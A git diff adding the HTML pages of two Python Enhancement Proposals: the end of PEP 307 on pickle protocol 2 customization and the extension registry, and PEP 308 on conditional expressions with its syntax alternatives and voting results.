A tuple giving the argument list for the function. +As a special case, designed for Zope 2’s +ExtensionClass, this may be None; in that case, +function should be a class or type, and +function.__basicnew__() is called to create the +initial version of the object. This exception is +deprecated.

+
+

Unpickling invokes function(*arguments) to create an initial object, +called obj below. If the remaining items are left off, that’s the end +of unpickling for this object and obj is the result. Else obj is +modified at unpickling time by each item specified, as follows.

+ + + + + + + + + + + + +
state (optional)

Additional state. If this is not None, the state is +pickled, and obj.__setstate__(state) will be called +when unpickling. If no __setstate__ method is +defined, a default implementation is provided, which +assumes that state is a dictionary mapping instance +variable names to their values. The default +implementation calls

+
obj.__dict__.update(state)
+
+
+

or, if the update() call fails,

+
for k, v in state.items():
+    setattr(obj, k, v)
+
+
+
listitems (optional; new in this PEP)

If this is not None, it should be an iterator (not a +sequence!) yielding successive list items. These list +items will be pickled, and appended to the object using +either obj.append(item) or obj.extend(list_of_items). +This is primarily used for list subclasses, but may +be used by other classes as long as they have append() +and extend() methods with the appropriate signature. +(Whether append() or extend() is used depends on which +pickle protocol version is used as well as the number +of items to append, so both must be supported.)

+
dictitems (optional; new in this PEP)

If this is not None, it should be an iterator (not a +sequence!) yielding successive dictionary items, which +should be tuples of the form (key, value). These items +will be pickled, and stored to the object using +obj[key] = value. This is primarily used for dict +subclasses, but may be used by other classes as long +as they implement __setitem__.

+
+
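Putting the five items together, a sketch of a __reduce__ for a hypothetical list subclass (the TaggedList class and its tag attribute are invented purely for illustration):

class TaggedList(list):
    def __init__(self, tag=None):
        list.__init__(self)
        self.tag = tag

    def __reduce__(self):
        return (TaggedList,        # function: recreates the object
                (),                # arguments: called as TaggedList()
                {'tag': self.tag}, # state: fed to the default __setstate__
                iter(self),        # listitems: re-appended one by one
                None)              # dictitems: unused here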

Note: in Python 2.2 and before, when using cPickle, state would be +pickled if present even if it is None; the only safe way to avoid +the __setstate__ call was to return a two-tuple from __reduce__. +(But pickle.py would not pickle state if it was None.) In Python +2.3, __setstate__ will never be called at unpickling time when +__reduce__ returns a state with value None at pickling time.

+

A __reduce__ implementation that needs to work both under Python +2.2 and under Python 2.3 could check the variable +pickle.format_version to determine whether to use the listitems +and dictitems features. If this value is >= "2.0" then they are +supported. If not, any list or dict items should be incorporated +somehow in the ‘state’ return value, and the __setstate__ method +should be prepared to accept list or dict items as part of the +state (how this is done is up to the application).

+
+
+

The __reduce_ex__ API

+

It is sometimes useful to know the protocol version when +implementing __reduce__. This can be done by implementing a +method named __reduce_ex__ instead of __reduce__. __reduce_ex__, +when it exists, is called in preference over __reduce__ (you may +still provide __reduce__ for backwards compatibility). The +__reduce_ex__ method will be called with a single integer +argument, the protocol version.

+

The ‘object’ class implements both __reduce__ and __reduce_ex__; +however, if a subclass overrides __reduce__ but not __reduce_ex__, +the __reduce_ex__ implementation detects this and calls +__reduce__.

+
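A sketch of the pattern (the Thing class is hypothetical, and only the protocol 2 branch is customized):

class Thing(object):
    def __reduce_ex__(self, protocol):
        if protocol >= 2:
            # a custom, more compact reduction for protocol 2
            return (Thing, (), self.__dict__)
        # otherwise defer to the inherited behaviour
        return object.__reduce_ex__(self, protocol)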
+
+

Customizing pickling absent a __reduce__ implementation

+

If no __reduce__ implementation is available for a particular +class, there are three cases that need to be considered +separately, because they are handled differently:

+
    +
  1. classic class instances, all protocols
  2. +
  3. new-style class instances, protocols 0 and 1
  4. +
  5. new-style class instances, protocol 2
  6. +
+

Types implemented in C are considered new-style classes. However, +except for the common built-in types, these need to provide a +__reduce__ implementation in order to be picklable with protocols +0 or 1. Protocol 2 supports built-in types providing +__getnewargs__, __getstate__ and __setstate__ as well.

+
+

Case 1: pickling classic class instances

+

This case is the same for all protocols, and is unchanged from +Python 2.1.

+

For classic classes, __reduce__ is not used. Instead, classic +classes can customize their pickling by providing methods named +__getstate__, __setstate__ and __getinitargs__. Absent these, a +default pickling strategy for classic class instances is +implemented that works as long as all instance variables are +picklable. This default strategy is documented in terms of +default implementations of __getstate__ and __setstate__.

+

The primary way to customize pickling of classic class instances is by specifying __getstate__ and/or __setstate__ methods. It is fine if a class implements one of these but not the other, as long as it is compatible with the default version.

+
+

The __getstate__ method

+

The __getstate__ method should return a picklable value +representing the object’s state without referencing the object +itself. If no __getstate__ method exists, a default +implementation is used that returns self.__dict__.

+
+
+

The __setstate__ method

+

The __setstate__ method should take one argument; it will be +called with the value returned by __getstate__ (or its default +implementation).

+

If no __setstate__ method exists, a default implementation is +provided that assumes the state is a dictionary mapping instance +variable names to values. The default implementation tries two +things:

+
    +
  • First, it tries to call self.__dict__.update(state).
  • +
  • If the update() call fails with a RuntimeError exception, it +calls setattr(self, key, value) for each (key, value) pair in +the state dictionary. This only happens when unpickling in +restricted execution mode (see the rexec standard library +module).
  • +
+
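Putting the two methods together for a classic class that holds something unpicklable (the Channel class and its open_connection helper are invented for illustration):

class Channel:                      # classic class: no (object) base
    def __init__(self, host):
        self.host = host
        self.conn = open_connection(host)   # hypothetical, not picklable

    def __getstate__(self):
        state = self.__dict__.copy()
        del state['conn']           # drop the unpicklable attribute
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        self.conn = open_connection(state['host'])   # rebuild on unpickling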
+
+

The __getinitargs__ method

+

The __setstate__ method (or its default implementation) requires +that a new object already exists so that its __setstate__ method +can be called. The point is to create a new object that isn’t +fully initialized; in particular, the class’s __init__ method +should not be called if possible.

+

These are the possibilities:

+
    +
  • Normally, the following trick is used: create an instance of a +trivial classic class (one without any methods or instance +variables) and then use __class__ assignment to change its +class to the desired class. This creates an instance of the +desired class with an empty __dict__ whose __init__ has not +been called.
  • +
  • However, if the class has a method named __getinitargs__, the +above trick is not used, and a class instance is created by +using the tuple returned by __getinitargs__ as an argument +list to the class constructor. This is done even if +__getinitargs__ returns an empty tuple — a __getinitargs__ +method that returns () is not equivalent to not having +__getinitargs__ at all. __getinitargs__ must return a +tuple.
  • +
  • In restricted execution mode, the trick from the first bullet +doesn’t work; in this case, the class constructor is called +with an empty argument list if no __getinitargs__ method +exists. This means that in order for a classic class to be +unpicklable in restricted execution mode, it must either +implement __getinitargs__ or its constructor (i.e., its +__init__ method) must be callable without arguments.
  • +
+
+
+
+

Case 2: pickling new-style class instances using protocols 0 or 1

+

This case is unchanged from Python 2.2. For better pickling of +new-style class instances when backwards compatibility is not an +issue, protocol 2 should be used; see case 3 below.

+

New-style classes, whether implemented in C or in Python, inherit +a default __reduce__ implementation from the universal base class +‘object’.

+

This default __reduce__ implementation is not used for those +built-in types for which the pickle module has built-in support. +Here’s a full list of those types:

+
    +
  • Concrete built-in types: NoneType, bool, int, float, complex, +str, unicode, tuple, list, dict. (Complex is supported by +virtue of a __reduce__ implementation registered in copy_reg.) +In Jython, PyStringMap is also included in this list.
  • +
  • Classic instances.
  • +
  • Classic class objects, Python function objects, built-in +function and method objects, and new-style type objects (== +new-style class objects). These are pickled by name, not by +value: at unpickling time, a reference to an object with the +same name (the fully qualified module name plus the variable +name in that module) is substituted.
  • +
+

The default __reduce__ implementation will fail at pickling time +for built-in types not mentioned above, and for new-style classes +implemented in C: if they want to be picklable, they must supply +a custom __reduce__ implementation under protocols 0 and 1.

+

For new-style classes implemented in Python, the default +__reduce__ implementation (copy_reg._reduce) works as follows:

+

Let D be the class of the object to be pickled. First, find the nearest base class that is implemented in C (either as a built-in type or as a type defined by an extension class); call this base class B. Unless B is the class ‘object’, instances of class B must be picklable, either by having built-in support (as defined in the above three bullet points), or by having a non-default __reduce__ implementation. B must not be the same class as D (if it were, it would mean that D is not implemented in Python).

+

The callable produced by the default __reduce__ is +copy_reg._reconstructor, and its arguments tuple is +(D, B, basestate), where basestate is None if B is the builtin +object class, and basestate is

+
basestate = B(obj)
+
+
+

if B is not the builtin object class. This is geared toward +pickling subclasses of builtin types, where, for example, +list(some_list_subclass_instance) produces “the list part” of +the list subclass instance.

+

The object is recreated at unpickling time by +copy_reg._reconstructor, like so:

+
obj = B.__new__(D, basestate)
+B.__init__(obj, basestate)
+
+
+

Objects using the default __reduce__ implementation can customize +it by defining __getstate__ and/or __setstate__ methods. These +work almost the same as described for classic classes above, except +that if __getstate__ returns an object (of any type) whose value is +considered false (e.g. None, or a number that is zero, or an empty +sequence or mapping), this state is not pickled and __setstate__ +will not be called at all. If __getstate__ exists and returns a +true value, that value becomes the third element of the tuple +returned by the default __reduce__, and at unpickling time the +value is passed to __setstate__. If __getstate__ does not exist, +but obj.__dict__ exists, then obj.__dict__ becomes the third +element of the tuple returned by __reduce__, and again at +unpickling time the value is passed to obj.__setstate__. The +default __setstate__ is the same as that for classic classes, +described above.

+

Note that this strategy ignores slots. Instances of new-style +classes that have slots but no __getstate__ method cannot be +pickled by protocols 0 and 1; the code explicitly checks for +this condition.

+

Note that pickling new-style class instances ignores __getinitargs__ +if it exists (and under all protocols). __getinitargs__ is +useful only for classic classes.

+
+
+

Case 3: pickling new-style class instances using protocol 2

+

Under protocol 2, the default __reduce__ implementation inherited +from the ‘object’ base class is ignored. Instead, a different +default implementation is used, which allows more efficient +pickling of new-style class instances than possible with protocols +0 or 1, at the cost of backward incompatibility with Python 2.2 +(meaning no more than that a protocol 2 pickle cannot be unpickled +before Python 2.3).

+

The customization uses three special methods: __getstate__, +__setstate__ and __getnewargs__ (note that __getinitargs__ is again +ignored). It is fine if a class implements one or more but not all +of these, as long as it is compatible with the default +implementations.

+
+

The __getstate__ method

+

The __getstate__ method should return a picklable value +representing the object’s state without referencing the object +itself. If no __getstate__ method exists, a default +implementation is used which is described below.

+

There’s a subtle difference between classic and new-style +classes here: if a classic class’s __getstate__ returns None, +self.__setstate__(None) will be called as part of unpickling. +But if a new-style class’s __getstate__ returns None, its +__setstate__ won’t be called at all as part of unpickling.

+

If no __getstate__ method exists, a default state is computed. +There are several cases:

+
    +
  • For a new-style class that has no instance __dict__ and no +__slots__, the default state is None.
  • +
  • For a new-style class that has an instance __dict__ and no +__slots__, the default state is self.__dict__.
  • +
  • For a new-style class that has an instance __dict__ and +__slots__, the default state is a tuple consisting of two +dictionaries: self.__dict__, and a dictionary mapping slot +names to slot values. Only slots that have a value are +included in the latter.
  • +
  • For a new-style class that has __slots__ and no instance +__dict__, the default state is a tuple whose first item is +None and whose second item is a dictionary mapping slot names +to slot values described in the previous bullet.
  • +
+
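For instance, under the last rule a slots-only class would get a two-item default state (a sketch; the Point class is invented, and the comment restates the rule above):

class Point(object):
    __slots__ = ('x', 'y')

p = Point()
p.x, p.y = 1, 2
# default state computed for protocol 2: (None, {'x': 1, 'y': 2})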
+
+

The __setstate__ method

+

The __setstate__ method should take one argument; it will be +called with the value returned by __getstate__ or with the +default state described above if no __getstate__ method is +defined.

+

If no __setstate__ method exists, a default implementation is +provided that can handle the state returned by the default +__getstate__, described above.

+
+
+

The __getnewargs__ method

+

Like for classic classes, the __setstate__ method (or its +default implementation) requires that a new object already +exists so that its __setstate__ method can be called.

+

In protocol 2, a new pickling opcode is used that causes a new +object to be created as follows:

+
obj = C.__new__(C, *args)
+
+
+

where C is the class of the pickled object, and args is either +the empty tuple, or the tuple returned by the __getnewargs__ +method, if defined. __getnewargs__ must return a tuple. The +absence of a __getnewargs__ method is equivalent to the existence +of one that returns ().

+
+
+
+
+

The __newobj__ unpickling function

+

When the unpickling function returned by __reduce__ (the first +item of the returned tuple) has the name __newobj__, something +special happens for pickle protocol 2. An unpickling function +named __newobj__ is assumed to have the following semantics:

+
def __newobj__(cls, *args):
+    return cls.__new__(cls, *args)
+
+
+

Pickle protocol 2 special-cases an unpickling function with this +name, and emits a pickling opcode that, given ‘cls’ and ‘args’, +will return cls.__new__(cls, *args) without also pickling a +reference to __newobj__ (this is the same pickling opcode used by +protocol 2 for a new-style class instance when no __reduce__ +implementation exists). This is the main reason why protocol 2 +pickles are much smaller than classic pickles. Of course, the +pickling code cannot verify that a function named __newobj__ +actually has the expected semantics. If you use an unpickling +function named __newobj__ that returns something different, you +deserve what you get.

+

It is safe to use this feature under Python 2.2; there’s nothing +in the recommended implementation of __newobj__ that depends on +Python 2.3.

+
+
+

The extension registry

+

Protocol 2 supports a new mechanism to reduce the size of pickles.

+

When class instances (classic or new-style) are pickled, the full +name of the class (module name including package name, and class +name) is included in the pickle. Especially for applications that +generate many small pickles, this is a lot of overhead that has to +be repeated in each pickle. For large pickles, when using +protocol 1, repeated references to the same class name are +compressed using the “memo” feature; but each class name must be +spelled in full at least once per pickle, and this causes a lot of +overhead for small pickles.

+

The extension registry allows one to represent the most frequently +used names by small integers, which are pickled very efficiently: +an extension code in the range 1–255 requires only two bytes +including the opcode, one in the range 256–65535 requires only +three bytes including the opcode.

+

One of the design goals of the pickle protocol is to make pickles +“context-free”: as long as you have installed the modules +containing the classes referenced by a pickle, you can unpickle +it, without needing to import any of those classes ahead of time.

+

Unbridled use of extension codes could jeopardize this desirable +property of pickles. Therefore, the main use of extension codes +is reserved for a set of codes to be standardized by some +standard-setting body. This being Python, the standard-setting +body is the PSF. From time to time, the PSF will decide on a +table mapping extension codes to class names (or occasionally +names of other global objects; functions are also eligible). This +table will be incorporated in the next Python release(s).

+

However, for some applications, like Zope, context-free pickles +are not a requirement, and waiting for the PSF to standardize +some codes may not be practical. Two solutions are offered for +such applications.

+

First, a few ranges of extension codes are reserved for private +use. Any application can register codes in these ranges. +Two applications exchanging pickles using codes in these ranges +need to have some out-of-band mechanism to agree on the mapping +between extension codes and names.

+

Second, some large Python projects (e.g. Zope) can be assigned a +range of extension codes outside the “private use” range that they +can assign as they see fit.

+

The extension registry is defined as a mapping between extension +codes and names. When an extension code is unpickled, it ends up +producing an object, but this object is gotten by interpreting the +name as a module name followed by a class (or function) name. The +mapping from names to objects is cached. It is quite possible +that certain names cannot be imported; that should not be a +problem as long as no pickle containing a reference to such names +has to be unpickled. (The same issue already exists for direct +references to such names in pickles that use protocols 0 or 1.)

+

Here is the proposed initial assignment of extension code ranges:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
First   Last   Count   Purpose
0       0      1       Reserved — will never be used
1       127    127     Reserved for Python standard library
128     191    64      Reserved for Zope
192     239    48      Reserved for 3rd parties
240     255    16      Reserved for private use (will never be assigned)
256     MAX    MAX     Reserved for future assignment
+

MAX stands for 2147483647, or 2**31-1. This is a hard limitation +of the protocol as currently defined.

+

At the moment, no specific extension codes have been assigned yet.

+
+

Extension registry API

+

The extension registry is maintained as private global variables +in the copy_reg module. The following three functions are defined +in this module to manipulate the registry:

+
+
add_extension(module, name, code)
Register an extension code. The module and name arguments +must be strings; code must be an int in the inclusive range 1 +through MAX. This must either register a new (module, name) +pair to a new code, or be a redundant repeat of a previous +call that was not canceled by a remove_extension() call; a +(module, name) pair may not be mapped to more than one code, +nor may a code be mapped to more than one (module, name) +pair.
+
remove_extension(module, name, code)
Arguments are as for add_extension(). Remove a previously +registered mapping between (module, name) and code.
+
clear_extension_cache()
The implementation of extension codes may use a cache to speed +up loading objects that are named frequently. This cache can +be emptied (removing references to cached objects) by calling +this method.
+
+

Note that the API does not enforce the standard range assignments. +It is up to applications to respect these.

+
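A sketch of private-range use (the module and class names are invented; 240-255 is the private-use range from the table above):

import copy_reg

# both pickling sides must agree on this mapping out-of-band
copy_reg.add_extension('myapp.models', 'Order', 240)

# removal must repeat the exact same arguments
copy_reg.remove_extension('myapp.models', 'Order', 240)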
+
+
+

The copy module

+

Traditionally, the copy module has supported an extended subset of +the pickling APIs for customizing the copy() and deepcopy() +operations.

+

In particular, besides checking for a __copy__ or __deepcopy__ +method, copy() and deepcopy() have always looked for __reduce__, +and for classic classes, have looked for __getinitargs__, +__getstate__ and __setstate__.

+

In Python 2.2, the default __reduce__ inherited from ‘object’ made +copying simple new-style classes possible, but slots and various +other special cases were not covered.

+

In Python 2.3, several changes are made to the copy module:

+
    +
  • __reduce_ex__ is supported (and always called with 2 as the +protocol version argument).
  • +
  • The four- and five-argument return values of __reduce__ are +supported.
  • +
  • Before looking for a __reduce__ method, the +copy_reg.dispatch_table is consulted, just like for pickling.
  • +
  • When the __reduce__ method is inherited from object, it is +(unconditionally) replaced by a better one that uses the same +APIs as pickle protocol 2: __getnewargs__, __getstate__, and +__setstate__, handling list and dict subclasses, and handling +slots.
  • +
+

As a consequence of the latter change, certain new-style classes +that were copyable under Python 2.2 are not copyable under Python +2.3. (These classes are also not picklable using pickle protocol +2.) A minimal example of such a class:

+
class C(object):
+    def __new__(cls, a):
+        return object.__new__(cls)
+
+
+

The problem only occurs when __new__ is overridden and has at +least one mandatory argument in addition to the class argument.

+

To fix this, a __getnewargs__ method should be added that returns +the appropriate argument tuple (excluding the class).

+
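For the minimal example above, the fix could look like this (the __init__ shown here is assumed, since the stripped-down example stores nothing):

class C(object):
    def __new__(cls, a):
        return object.__new__(cls)

    def __init__(self, a):
        self.a = a

    def __getnewargs__(self):
        return (self.a,)    # recreated as C.__new__(C, a)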
+
+

Pickling Python longs

+

Pickling and unpickling Python longs takes time quadratic in +the number of digits, in protocols 0 and 1. Under protocol 2, +new opcodes support linear-time pickling and unpickling of longs.

+
+
+

Pickling bools

+

Protocol 2 introduces new opcodes for pickling True and False +directly. Under protocols 0 and 1, bools are pickled as integers, +using a trick in the representation of the integer in the pickle +so that an unpickler can recognize that a bool was intended. That +trick consumed 4 bytes per bool pickled. The new bool opcodes +consume 1 byte per bool.

+
+
+

Pickling small tuples

+

Protocol 2 introduces new opcodes for more-compact pickling of +tuples of lengths 1, 2 and 3. Protocol 1 previously introduced +an opcode for more-compact pickling of empty tuples.

+
+
+

Protocol identification

+

Protocol 2 introduces a new opcode, with which all protocol 2 +pickles begin, identifying that the pickle is protocol 2. +Attempting to unpickle a protocol 2 pickle under older versions +of Python will therefore raise an “unknown opcode” exception +immediately.

+
+
+

Pickling of large lists and dicts

+

Protocol 1 pickles large lists and dicts “in one piece”, which +minimizes pickle size, but requires that unpickling create a temp +object as large as the object being unpickled. Part of the +protocol 2 changes break large lists and dicts into pieces of no +more than 1000 elements each, so that unpickling needn’t create +a temp object larger than needed to hold 1000 elements. This +isn’t part of protocol 2, however: the opcodes produced are still +part of protocol 1. __reduce__ implementations that return the +optional new listitems or dictitems iterators also benefit from +this unpickling temp-space optimization.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0307.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0308/index.html b/pep-0308/index.html
new file mode 100644
index 00000000000..a022d4f7fab
--- /dev/null
+++ b/pep-0308/index.html
@@ -0,0 +1,557 @@

PEP 308 – Conditional Expressions | peps.python.org
+
+


+ + +
+
+
+

PEP 308 – Conditional Expressions

+
+
Author:
+
Guido van Rossum, Raymond Hettinger
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
07-Feb-2003
+
Python-Version:
+
2.5
+
Post-History:
+
07-Feb-2003, 11-Feb-2003
+
+
+
+
Table of Contents +
+
+

Adding a conditional expression

+

On 9/29/2005, Guido decided to add conditional expressions in the +form of “X if C else Y”. [1]

+

The motivating use case was the prevalence of error-prone attempts +to achieve the same effect using “and” and “or”. [2]

+
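A small example of the accepted form; only the branch that is selected gets evaluated:

d = 0
inverse = 1.0 / d if d else 0.0   # no ZeroDivisionError: the condition guards it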

Previous community efforts to add a conditional expression were +stymied by a lack of consensus on the best syntax. That issue was +resolved by simply deferring to a BDFL best judgment call.

+

The decision was validated by reviewing how the syntax fared when +applied throughout the standard library (this review approximates a +sampling of real-world use cases, across a variety of applications, +written by a number of programmers with diverse backgrounds). [3]

+

The following change will be made to the grammar. (The or_test symbol is new; the others are modified.)

+
test: or_test ['if' or_test 'else' test] | lambdef
+or_test: and_test ('or' and_test)*
+...
+testlist_safe: or_test [(',' or_test)+ [',']]
+...
+gen_for: 'for' exprlist 'in' or_test [gen_iter]
+
+
+

The new syntax nearly introduced a minor syntactical backwards +incompatibility. In previous Python versions, the following is +legal:

+
[f for f in lambda x: x, lambda x: x**2 if f(1) == 1]
+
+
+

(I.e. a list comprehension where the sequence following ‘in’ is an +unparenthesized series of lambdas – or just one lambda, even.)

+

In Python 3.0, the series of lambdas will have to be +parenthesized, e.g.:

+
[f for f in (lambda x: x, lambda x: x**2) if f(1) == 1]
+
+
+

This is because lambda binds less tightly than the if-else expression, but in this context, the lambda could already be followed by an ‘if’ keyword that binds less tightly still (for details, consider the grammar changes shown above).

+

However, in Python 2.5, a slightly different grammar is used that is more backwards compatible, but constrains the grammar of a lambda used in this position by forbidding the lambda’s body to contain an unparenthesized conditional expression. Examples:

+
[f for f in (1, lambda x: x if x >= 0 else -1)]    # OK
+[f for f in 1, (lambda x: x if x >= 0 else -1)]    # OK
+[f for f in 1, lambda x: (x if x >= 0 else -1)]    # OK
+[f for f in 1, lambda x: x if x >= 0 else -1]      # INVALID
+
+
+
+
+

References

+ +
+
+

Introduction to earlier draft of the PEP (kept for historical purposes)

+

Requests for an if-then-else (“ternary”) expression keep coming up +on comp.lang.python. This PEP contains a concrete proposal of a +fairly Pythonic syntax. This is the community’s one chance: if +this PEP is approved with a clear majority, it will be implemented +in Python 2.4. If not, the PEP will be augmented with a summary +of the reasons for rejection and the subject better not come up +again. While the BDFL is co-author of this PEP, he is neither in +favor nor against this proposal; it is up to the community to +decide. If the community can’t decide, the BDFL will reject the +PEP.

+

After unprecedented community response (very good arguments were +made both pro and con) this PEP has been revised with the help of +Raymond Hettinger. Without going through a complete revision +history, the main changes are a different proposed syntax, an +overview of proposed alternatives, the state of the current +discussion, and a discussion of short-circuit behavior.

+

Following the discussion, a vote was held. While there was an overall +interest in having some form of if-then-else expressions, no one +format was able to draw majority support. Accordingly, the PEP was +rejected due to the lack of an overwhelming majority for change. +Also, a Python design principle has been to prefer the status quo +whenever there are doubts about which path to take.

+
+
+

Proposal

+

The proposed syntax is as follows:

+
(if <condition>: <expression1> else: <expression2>)
+
+
+

Note that the enclosing parentheses are not optional.

+

The resulting expression is evaluated like this:

+
    +
  • First, <condition> is evaluated.
  • +
  • If <condition> is true, <expression1> is evaluated and is the +result of the whole thing.
  • +
  • If <condition> is false, <expression2> is evaluated and is the +result of the whole thing.
  • +
+

A natural extension of this syntax is to allow one or more ‘elif’ +parts:

+
(if <cond1>: <expr1> elif <cond2>: <expr2> ... else: <exprN>)
+
+
+

This will be implemented if the proposal is accepted.

+

The downsides to the proposal are:

+
    +
  • the required parentheses
  • +
  • confusability with statement syntax
  • +
  • additional semantic loading of colons
  • +
+

Note that at most one of <expression1> and <expression2> is +evaluated. This is called a “short-circuit expression”; it is +similar to the way the second operand of ‘and’ / ‘or’ is only +evaluated if the first operand is true / false.

+

A common way to emulate an if-then-else expression is:

+
<condition> and <expression1> or <expression2>
+
+
+

However, this doesn’t work the same way: it returns <expression2> +when <expression1> is false! See FAQ 4.16 for alternatives that +work – however, they are pretty ugly and require much more effort +to understand.

+
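The failure is easy to demonstrate:

cond = True
result = cond and '' or 'default'
# result == 'default': '' is false, so 'or' falls through,
# even though cond is true and '' was the intended value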
+
+

Alternatives

+

Holger Krekel proposed a new, minimally invasive variant:

+
<condition> and <expression1> else <expression2>
+
+
+

The concept behind it is that a nearly complete ternary operator already exists with and/or and this proposal is the least invasive change that makes it complete. Many respondents on the newsgroup found this to be the most pleasing alternative. However, a couple of respondents were able to post examples that were mentally difficult to parse. Later it was pointed out that this construct works by having the “else” change the existing meaning of “and”.

+

As a result, there is increasing support for Christian Tismer’s +proposed variant of the same idea:

+
<condition> then <expression1> else <expression2>
+
+
+

The advantages are simple visual parsing, no required parentheses, +no change in the semantics of existing keywords, not as likely +as the proposal to be confused with statement syntax, and does +not further overload the colon. The disadvantage is the +implementation costs of introducing a new keyword. However, +unlike other new keywords, the word “then” seems unlikely to +have been used as a name in existing programs.

+

+

Many C-derived languages use this syntax:

+
<condition> ? <expression1> : <expression2>
+
+
+

Eric Raymond even implemented this. The BDFL rejected this for several reasons: the colon already has many uses in Python (even though it would actually not be ambiguous, because the question mark requires a matching colon); for people not used to C-derived languages, it is hard to understand.

+

+

The original version of this PEP proposed the following syntax:

+
<expression1> if <condition> else <expression2>
+
+
+

The out-of-order arrangement was found to be too uncomfortable for many participants in the discussion; especially when <expression1> is long, it’s easy to miss the conditional while skimming.

+

+

Some have suggested adding a new builtin instead of extending the +syntax of the language. For example:

+
cond(<condition>, <expression1>, <expression2>)
+
+
+

This won’t work the way a syntax extension will because both +expression1 and expression2 must be evaluated before the function +is called. There’s no way to short-circuit the expression +evaluation. It could work if ‘cond’ (or some other name) were +made a keyword, but that has all the disadvantages of adding a new +keyword, plus confusing syntax: it looks like a function call so +a casual reader might expect both <expression1> and <expression2> +to be evaluated.

+
+
+

Summary of the Current State of the Discussion

+

Groups are falling into one of three camps:

+
    +
  1. Adopt a ternary operator built using punctuation characters:
    <condition> ? <expression1> : <expression2>
    +
    +
    +
  2. +
  3. Adopt a ternary operator built using new or existing keywords. +The leading examples are:
    <condition> then <expression1> else <expression2>
    +(if <condition>: <expression1> else: <expression2>)
    +
    +
    +
  4. +
  5. Do nothing.
  6. +
+

The first two positions are relatively similar.

+

Some find that any form of punctuation makes the language more +cryptic. Others find that punctuation style is appropriate for +expressions rather than statements and helps avoid a COBOL style: +3 plus 4 times 5.

+

Adapting existing keywords attempts to improve on punctuation +through explicit meaning and a more tidy appearance. The downside +is some loss of the economy-of-expression provided by punctuation +operators. The other downside is that it creates some degree of +confusion between the two meanings and two usages of the keywords.

+

Those difficulties are overcome by options which introduce new +keywords which take more effort to implement.

+

The last position is doing nothing. Arguments in favor include keeping the language simple and concise; maintaining backwards compatibility; and that every use case can already be expressed in terms of “if” and “else”. Lambda expressions are an exception as they require the conditional to be factored out into a separate function definition.

+

The arguments against doing nothing are that the other choices allow greater economy of expression and that current practices show a propensity for erroneous uses of “and”, “or”, or one of their more complex, visually unappealing workarounds.

+
+
+

Short-Circuit Behavior

+

The principal difference between the ternary operator and the +cond() function is that the latter provides an expression form but +does not provide short-circuit evaluation.

+

Short-circuit evaluation is desirable on three occasions:

+
    +
  1. When an expression has side-effects
  2. +
  3. When one or both of the expressions are resource intensive
  4. +
  5. When the condition serves as a guard for the validity of the +expression.
  6. +
+
#  Example where all three reasons apply
+data = isinstance(source, file)  ?  source.readlines()
+                                 :  source.split()
+
+
+
    +
  1. readlines() moves the file pointer
  2. +
  3. for long sources, both alternatives take time
  4. +
  5. split() is only valid for strings and readlines() is only +valid for file objects.
  6. +
+

Supporters of a cond() function point out that the need for +short-circuit evaluation is rare. Scanning through existing code +directories, they found that if/else did not occur often; and of +those only a few contained expressions that could be helped by +cond() or a ternary operator; and that most of those had no need +for short-circuit evaluation. Hence, cond() would suffice for +most needs and would spare efforts to alter the syntax of the +language.

+

More supporting evidence comes from scans of C code bases which show that its ternary operator is used very rarely (as a percentage of lines of code).

+

A counterpoint to that analysis is that the availability of a +ternary operator helped the programmer in every case because it +spared the need to search for side-effects. Further, it would +preclude errors arising from distant modifications which introduce +side-effects. The latter case has become more of a reality with +the advent of properties where even attribute access can be given +side-effects.

+

The BDFL’s position is that short-circuit behavior is essential +for an if-then-else construct to be added to the language.

+
+
+

Detailed Results of Voting

+
Votes rejecting all options:  82
+Votes with rank ordering:     436
+                              ---
+Total votes received:         518
+
+
+        ACCEPT                  REJECT                  TOTAL
+        ---------------------   ---------------------   -----
+        Rank1   Rank2   Rank3   Rank1   Rank2   Rank3
+Letter
+A       51      33      19      18      20      20      161
+B       45      46      21      9       24      23      168
+C       94      54      29      20      20      18      235
+D       71      40      31      5       28      31      206
+E       7       7       10              3       5       32
+F       14      19      10              7       17      67
+G       7       6       10      1       2       4       30
+H       20      22      17      4       10      25      98
+I       16      20      9       5       5       20      75
+J       6       17      5       1               10      39
+K       1               6               4       13      24
+L               1       2               3       3       9
+M       7       3       4       2       5       11      32
+N               2       3               4       2       11
+O       1       6       5       1       4       9       26
+P       5       3       6       1       5       7       27
+Q       18      7       15      6       5       11      62
+Z                                               1       1
+        ---     ---     ---     ---     ---     ---     ----
+Total   363     286     202     73      149     230     1303
+RejectAll                       82      82      82      246
+        ---     ---     ---     ---     ---     ---     ----
+Total   363     286     202     155     231     312     1549
+
+
+
+

CHOICE KEY

+
A.  x if C else y
+B.  if C then x else y
+C.  (if C: x else: y)
+D.  C ? x : y
+E.  C ? x ! y
+F.  cond(C, x, y)
+G.  C ?? x || y
+H.  C then x else y
+I.  x when C else y
+J.  C ? x else y
+K.  C -> x else y
+L.  C -> (x, y)
+M.  [x if C else y]
+N.  ifelse C: x else y
+O.  <if C then x else y>
+P.  C and x else y
+Q.  any write-in vote
+
+
+
+
+

Detail for write-in votes and their ranking

+
3:  Q reject y x C elsethenif
+2:  Q accept (C ? x ! y)
+3:  Q reject ...
+3:  Q accept  ? C : x : y
+3:  Q accept (x if C, y otherwise)
+3:  Q reject ...
+3:  Q reject NONE
+1:  Q accept   select : (<c1> : <val1>; [<cx> : <valx>; ]* elseval)
+2:  Q reject if C: t else: f
+3:  Q accept C selects x else y
+2:  Q accept iff(C, x, y)    # "if-function"
+1:  Q accept (y, x)[C]
+1:  Q accept          C true: x false: y
+3:  Q accept          C then: x else: y
+3:  Q reject
+3:  Q accept (if C: x elif C2: y else: z)
+3:  Q accept C -> x : y
+1:  Q accept  x (if C), y
+1:  Q accept if c: x else: y
+3:  Q accept (c).{True:1, False:2}
+2:  Q accept if c: x else: y
+3:  Q accept (c).{True:1, False:2}
+3:  Q accept if C: x else y
+1:  Q accept  (x if C else y)
+1:  Q accept ifelse(C, x, y)
+2:  Q reject x or y <- C
+1:  Q accept (C ? x : y) required parens
+1:  Q accept  iif(C, x, y)
+1:  Q accept ?(C, x, y)
+1:  Q accept switch-case
+2:  Q accept multi-line if/else
+1:  Q accept C: x else: y
+2:  Q accept (C): x else: y
+3:  Q accept if C: x else: y
+1:  Q accept     x if C, else y
